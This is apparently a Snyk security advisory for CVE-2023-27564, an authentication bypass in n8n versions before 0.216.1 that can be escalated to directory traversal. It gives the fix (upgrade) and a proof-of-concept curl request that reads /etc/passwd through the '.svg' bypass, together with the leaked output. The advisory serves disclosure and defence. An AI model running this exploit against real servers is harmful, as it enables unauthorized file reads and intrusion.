<p>Upgrade <code>n8n</code> to version 0.216.1 or higher.</p>

Authentication Bypass Affecting n8n package, versions <0.216.1

Snyk CVSS

Attack Complexity Low

Threat Intelligence

EPSS 0.08% (33^rd percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk ID SNYK-JS-N8N-5518108
published 11 May 2023
disclosed 11 May 2023
credit Synacktiv team

Report a new vulnerability Found a mistake?

Introduced: 11 May 2023

CVE-2023-27564 Open this link in a new tab CWE-287 Open this link in a new tab

How to fix?

Upgrade n8n to version 0.216.1 or higher.

Overview

n8n is a n8n Workflow Automation Tool

Affected versions of this package are vulnerable to Authentication Bypass due to loose condition in auth.ts, which allows any user to send requests to an endpoint as long as request includes .svg. Exploiting this vulnerability might be escalated to directory traversal.

PoC


$ curl -ksi 'https://redacted.com/rest/data/filesystem:..%2F..%2F..%2F..%2F..%2F..%2F..
%2F..%2F..%2Fetc%2Fpasswd:.svg'


HTTP/1.1 200 OK
[...]
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
[...]
nobody:x:65534:65534:nobody:/:/sbin/nologin
node:x:1000:1000:Linux User,,,:/home/node:/bin/sh